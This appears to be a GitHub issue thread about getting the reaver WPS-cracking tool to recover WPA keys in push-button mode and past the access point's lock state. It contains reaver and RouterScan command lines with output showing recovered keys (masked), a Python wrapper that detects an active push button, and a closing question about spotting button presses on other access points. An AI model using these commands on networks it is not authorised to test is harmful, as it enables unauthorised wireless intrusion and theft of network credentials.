But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work
Try to reboot your router, after reboot it may be that WPS lock flag goes back to unlocked and then press PBC button
@minanagehsalalma, when WPS button was pushed, you should use
-p 00000000
to get the password and not with-p 12345670
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 3 -vvLN -p 00000000
@feitoi Yeah just tested it, without the button pushed:
reaver -i wlan0mon -c 3 -b EX:3X:B3:X0:7B:21 -vvLN -p 00000000
[+] Switching wlan0mon to channel 3
[+] Waiting for beacon from EX:3X:B3:X0:7B:21
[+] Received beacon from EX:3X:B3:X0:7B:21
[+] Vendor: RalinkTe
[+] Trying pin "00000000"
[+] Sending authentication request
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAAAAAA)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK (reason: 0x0012)
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
With the button pushed:
reaver -i wlan0mon -c 3 -b EX:3X:B3:X0:7B:21 -vvLN -p 00000000
[+] Switching wlan0mon to channel 3
[?] Restore previous session for EX:3X:B3:X0:7B:21? [n/Y] n
[+] Waiting for beacon from EX:3X:B3:X0:7B:21
[+] Received beacon from EX:3X:B3:X0:7B:21
[+] Vendor: RalinkTe
[+] Trying pin "00000000"
[+] Sending authentication request
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAAAA)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 4 seconds
[+] WPS PIN: '00000000'
[+] WPA PSK: 'XXXXXXXXX'
[+] AP SSID: 'AAAAAAAA '
But I still don't understand why it fails when WPS is locked, even when using the -L flag and -p 00000000 while the button is pushed? It should ignore the lock and then use that PIN to connect, but why doesn't it do that?
i'd assume the reaver option
-L, --ignore-locks Ignore locked state reported by the target AP
should make it possible even in that case.
@rofl0r As you see i tested it again and it doesn't work.
I think you missed to do WPS authentication while capturing with wireshark.
hmm i didn't think that was needed.
As @rofl0r says, reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.
@feitoi oh now i get it .... so it still does the PIN method even when PBC is pushed haha that's funny.
that -L not works is probably due to the other errors that cause a WSC NACK to be sent in the first place (you'd see it with -vvvv).
For some reason i can't still figure it out haha, echo not found shouldn't be even be an option
the issue is that wash process keeps running.
here's a wrapper that you can use
import subprocess, sys

# run the real wash binary with whatever arguments were passed to this wrapper;
# replace this path with the path to your wash binary
argv = list(sys.argv)
argv[0] = '../src/wash'
proc = subprocess.Popen(argv, executable=argv[0], stdout=subprocess.PIPE)
while 1:
    line = proc.stdout.readline()
    if line == '': break  # wash exited (EOF on its stdout)
    print line
    # wash -j prints this field once the AP advertises Device Password ID 4 (push button)
    if '"wps_device_password_id" : "0004"' in line:
        print "WPS PBC enabled"
        proc.terminate()
        break
just replace ../wash with the path to wash and run it like python2 washwrap.py -j -f with\ pbc.cap
that -L not works is probably due to the other errors that cause a WSC NACK to be sent in the first place (you'd see it with -vvvv).
WPS: * Device Password ID (4)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 15
[+] Received WSC NACK (reason: 0x000F)
[!] WARNING: Detected AP has WPS setup locked!
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[!] WPS transaction failed (code: 0x04), re-trying last pin
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
[+] Quitting after 0 crack attempts
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.
Are you sure it's not because Reaver uses the PIN method while the router is using PBC? as feitoi said
reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.
just replace ../wash with the path to wash and run it like
python2 washwrap.py -j -f with\ pbc.cap
@rofl0r Huh? Why read or write to a file? Can't it be done live..... I don't get how to use it.
WPS: * Device Password ID (4)
the interesting stuff comes before that.
Are you sure it's not because Reaver uses the PIN method while the router is using PBC?
no, i'm not. i didn't study how PBC works and am of the impression it works identical to pin mode except pin "00000000" needs to be sent. but maybe there's more to it.
just replace ../wash with the path to wash and run it like python2 washwrap.py -j -f with\ pbc.cap
@rofl0r Huh? Why read or write to a file?
what read or write ? this script starts wash as a controlled subprocess and terminates it as soon as the line with the PBC indicator is received.
Can't it be done live..... I don't get how to use it.
save the script as washwrapper.py and run it instead of wash with all arguments you'd usually pass to wash. like python2 washwrapper.py -j -i wlan0mon -c 6. i can't see anything difficult about it. you only got to modify the path to the wash binary instead of "../src/wash"
the interesting stuff comes before that.
@rofl0r Here it is
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
30 30 30 30 30 30 30 30 00000000
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "00000000"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: AAAAAA)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
WPS: Enrollee MAC Address EX:3X:B3:X0:7B:21
WPS: Enrollee Nonce - hexdump(len=16): da 6b f2 5f e4 56 ef 85 ea 45 fb ca 2b ca 06 e2
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
5a 79 78 65 6c TTTT
WPS: Model Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 TTTT-TTTB
WPS: Model Number - hexdump_ascii(len=6):
52 54 32 38 36 30 RT2860
WPS: Serial Number - hexdump_ascii(len=4):
31 32 33 34 1234
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 TTTT-TTTB
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 5c 92 2e 94 3b b5 4a 75 93 0b 28 b8 5e 1b 8b fa
WPS: UUID-R - hexdump(len=16): 79 69 24 bb bd 1d 37 c0 04 70 f6 97 6b e5 e7 41
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
WPS: DHKey - hexdump(len=32): 6b c3 bb 6b 93 92 fe 02 e1 e7 6b e8 80 90 60 b7 e6 96 f3 51 df 53 e3 73 1c 94 f2 34 18 e2 5c 05
WPS: KDK - hexdump(len=32): fa ab e9 c0 c4 b4 e9 6b 52 1e 04 77 9f bf 45 c6 0f f1 e8 03 18 5f 50 a2 e4 66 f2 ec 9d 5a d2 72
WPS: AuthKey - hexdump(len=32): c9 59 f4 7a 86 dc 97 04 00 77 27 17 07 17 e0 56 85 b2 45 0a 3c 83 2d 00 86 73 a6 cb 3d 1c ce e7
WPS: KeyWrapKey - hexdump(len=16): 8c be 70 f5 39 84 3b 4f fb ba 4f 64 c9 16 2c 9b
WPS: EMSK - hexdump(len=32): 58 c6 9b 76 8b 8e 4d 1a c3 f8 11 00 e6 f4 8b 80 5e 6a 1e d9 41 97 98 ee 06 75 3e 3a 3c 2b b7 fa
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
what read or write ?
i was talking about the pbc.cap and -f you told me to run it with
python2 washwrap.py -j -f with\ pbc.cap
Yeah that worked great, Thanks a lot
python2 washwrapper.py -j -i wlan0mon -c 6.
you only got to modify the path to the wash binary instead of "../src/wash"
but why do i need to type the path? i just typed wash with no paths
i also changed the order of these two lines
@rofl0r I added the script to the unix.stackexchange answer too
Thanks Every one for your Help so far ...
I learned a lot and figured out a lot of things that weren't possible with searching
it wasn't possible without you ;)
The only thing missing is for Reaver to ignore the "AP has WPS setup locked" state when the WPS button is pushed, and to work with -L -p 00000000 on PBC
@minanagehsalalma if you can provide 2 pcaps:
i can take a look at what would be needed on the reaver side to support it.
@rofl0r
ReaverPBCFailing
reaver -i wlan0mon -c 3 -b Mac -vvLN -p 00000000
The output is the same as always
And using router scan with the ignore lock flag
[*] Audit started at 2022.01.26 22:08:44 (UTC+02:00).
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] Received WPS Message M2.
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
[*] Audit stopped at 2022.01.26 22:08:52 (UTC+02:00).
i can take a look at what would be needed on the reaver side to support it.
Thanks a lot 😘
Also, as a bonus, can we get a quick view of extracting the values needed for -7, --m7-enc
Aka the real title of the issue here and also the title of an earlier issue you posted
guide or tool to get -7 values from pcap
Here is the Display Filter Reference: Wifi Protected Setup for wireshark again .. i still don't quite get how to extract them
Edit: Ah never mind, i just noticed that it only works for routers with the Realtek RTL819x chipset so.... and that's a really old one, and even if anything uses it .... they have already patched a bug that allowed such an attack
The output is the same as always
yes, but i requested a pcap, not the output, in order to compare it with routerscan pcap.
again .. i still don't quite get how to extract them
there's an open ticket for that, #89 . feel free to create a wiki page to document the process if you find out.
yes, but i requested a pcap, not the output, in order to compare it with routerscan pcap.
well ... The zip file is right there
I posted the output just in case
@rofl0r so how is it going ?
there's an open ticket for that, #89 . feel free to create a wiki page to document the process if you find out.
I don't think it would be much of a use , as the bug is super old and exists in old devices only and it's already patched .. so ...
@rofl0r Look at this. We were speaking about a way to go through the wpa_cli wps connect in monitor mode
And kcdtv mentioned that you are a member of the forum 😅
So you probably know what's up haha
He told me that wpa_cli wps_pbc is the only available way to do such a thing
So i think Reaver would be the first to provide an alternative
@rofl0r any news ?
i've been busy with RL so i didn't have time to look into your PCAPs. hopefully next week.
i've been busy with RL so i didn't have time to look into your PCAPs. hopefully next week.
@rofl0r np , Thanks a lot mate
I am trying to know if it's possible to know if the WPS button was pushed on some AP without trying to connect to it, but with just monitoring it. So i think sniffing a PBC session is what i am looking for, so i would like to know how it works. Thanks